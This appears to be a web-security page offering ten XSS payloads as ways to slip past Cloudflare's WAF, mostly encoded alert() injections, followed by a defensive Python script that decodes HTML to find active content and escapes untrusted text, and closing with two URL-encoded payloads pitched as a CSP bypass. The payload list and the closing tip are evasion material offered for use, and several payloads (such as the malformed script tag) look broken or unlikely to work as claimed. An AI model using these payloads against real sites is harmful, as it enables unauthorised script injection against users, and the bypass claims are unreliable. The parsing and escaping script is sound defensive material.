# Cloudflare's XSS protection

Cloudflare's web application firewall includes rules intended to block Cross-Site Scripting (XSS) payloads, but attackers may still find ways past them. The 10 payloads below are examples that could potentially bypass Cloudflare's XSS protection; most rely on encoding (HTML character references, `String.fromCharCode`, `\u` escapes) or on inserting comments and whitespace so that the literal strings a rule matches on never appear in the raw request:

1. Unicode encoding:

```html
<scr&#x9Cipt>alert(1)</scr&#x9Cipt>
```

2. Using HTML entities:

```html
<img src=x onerror=&#x61lert&#x28&#x27123&#x27&#x29>
```

3. Using JavaScript URL encoding:

```html
<script src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x68&#x74&#x74&#x70&#x3A&#x2F&#x2F&#x77&#x77&#x77&#x2E&#x61&#x6C&#x65&#x72&#x74&#x2E&#x63&#x6F&#x6D&#x2F&#x73&#x63&#x72&#x69&#x70&#x74&#x27&#x29>
```

4. Using JavaScript encoding:

```html
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
```

5. Using CSS expressions:

```html
<style>@import'\u006A\u0061\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003A\u0061\u006C\u0065\u0072\u0074\u0028\u0027\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0077\u0077\u0077\u002E\u0061\u006C\u0065\u0072\u0074\u002E\u0063\u006F\u006D\u002F\u0073\u0063\u0072\u0069\u0070\u0074\u0027\u0029';</style>
```

6. Using JavaScript comments:

```html
<script>/*-/**/alert(1)/*-/*-->/*</script>
```

7. Using event handlers:

```html
<body onload=alert(1)>
```

8. Using JavaScript encoding with comments:

```html
<script>eval(String.fromCharCode(/*-*/97/*-*/,/*-*/108/*-*/,/*-*/101/*-*/,/*-*/114/*-*/,/*-*/116/*-*/,/*-*/40/*-*/,/*-*/49/*-*/,/*-*/41/*-*/))</script>
```

9. Using JavaScript encoding with whitespace:

```html
<script>eval(String.fromCharCode( 97, 108, 101, 114, 116, 40, 49, 41 ))</script>
```

10. Using JavaScript encoding with different encoding schemes:

```html
<script>eval(String.fromCharCode(0x61,0x6C,0x65,0x72,0x74,0x28,0x31,0x29))</script>
```
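As an added defensive example (not code from the original page or from Cloudflare), the Python script below shows why a rule that matches signatures against the raw request bytes misses entity-encoded forms such as payloads 2 and 3, while parsing the fragment with the standard library's `HTMLParser` (which decodes character references inside attribute values) exposes the decoded event handler and the `javascript:` URL. It also shows the mitigation that does not depend on a WAF at all: escaping untrusted text with `html.escape` before it is interpolated into HTML, after which the parser finds nothing active. The sample inputs are constructed: the event-handler sample is payload 2 from the list above, the `javascript:` sample is a shortened variant of payload 3, and the benign string is made up. The `NAIVE_SIGNATURE` pattern is an assumed stand-in for a literal-string WAF rule, not Cloudflare's actual rule set.

```python
"""Raw-signature matching versus parse-then-inspect for HTML fragments.

Added example, not from the original page. Constructed inputs only.
"""
import html
import re
from html.parser import HTMLParser

# Constructed sample inputs (see lead-in): payload 2 from the list above,
# a shortened variant of payload 3, and a harmless string with entities.
SAMPLES = {
    "entity_handler": "<img src=x onerror=&#x61lert&#x28&#x27123&#x27&#x29>",
    "entity_js_url": (
        "<script src=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A"
        "&#x61&#x6C&#x65&#x72&#x74&#x28&#x31&#x29>"
    ),
    "benign": "Tom &amp; Jerry <3 'quotes' &#x3C;not a tag&#x3E;",
}

# Weak check (assumed stand-in for a literal-string WAF rule): the strings it
# looks for never appear in the raw bytes of an entity-encoded payload.
NAIVE_SIGNATURE = re.compile(r"javascript:|alert\s*\(", re.IGNORECASE)


def naive_flag(fragment: str) -> bool:
    """True if the raw, undecoded fragment contains one of the literal strings."""
    return bool(NAIVE_SIGNATURE.search(fragment))


# Attributes whose value is a URL a browser will navigate to or fetch.
URL_ATTRS = {"src", "href", "action", "formaction", "data", "xlink:href"}


def scheme_of(value: str):
    """Return the URL scheme of an attribute value, or None.

    Conservatively drops every ASCII control character and space first; this is
    a superset of what a browser's URL parser strips, so a scheme split by tabs
    or newlines is still recognised.
    """
    cleaned = re.sub(r"[\x00-\x20]", "", value)
    match = re.match(r"([a-zA-Z][a-zA-Z0-9+.\-]*):", cleaned)
    return match.group(1).lower() if match else None


class ActiveContentFinder(HTMLParser):
    """Collects script tags, on* handlers and javascript: URLs.

    HTMLParser decodes character references in attribute values before calling
    handle_starttag, so encoded handler bodies and URLs arrive decoded.
    """

    def __init__(self):
        super().__init__()
        self.findings = []  # (kind, tag, attribute, decoded value)

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append(("script_tag", tag, None, None))
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):
                self.findings.append(("event_handler", tag, name, value))
            elif name in URL_ATTRS and scheme_of(value) == "javascript":
                self.findings.append(("javascript_url", tag, name, value))


def inspect(fragment: str):
    """Parse the fragment the way a browser would and return active content found."""
    finder = ActiveContentFinder()
    finder.feed(fragment)
    finder.close()
    return finder.findings


def render_untrusted(text: str) -> str:
    """The fix that does not rely on a WAF: escape before interpolating into HTML."""
    return '<p class="comment">' + html.escape(text, quote=True) + "</p>"


if __name__ == "__main__":
    for label, fragment in SAMPLES.items():
        print(f"{label}: naive={naive_flag(fragment)} parsed={inspect(fragment)}")
    # Escaped output of the same payload: the parser sees only text.
    print("escaped:", inspect(render_untrusted(SAMPLES["entity_handler"])))
```

The point of the comparison is that decoding must happen before inspection, and that even then a detector is a backstop: the escaped rendering in `render_untrusted` is safe for every payload in the list because it never lets untrusted input reach a tag, attribute or URL context in the first place.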

If a CSP policy blocked you while trying XSS, be sure to try two separate (encoded) XSS payloads one after another; this may help you bypass the filter.

1- `%3C/script%20%3E`

2- `mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E`
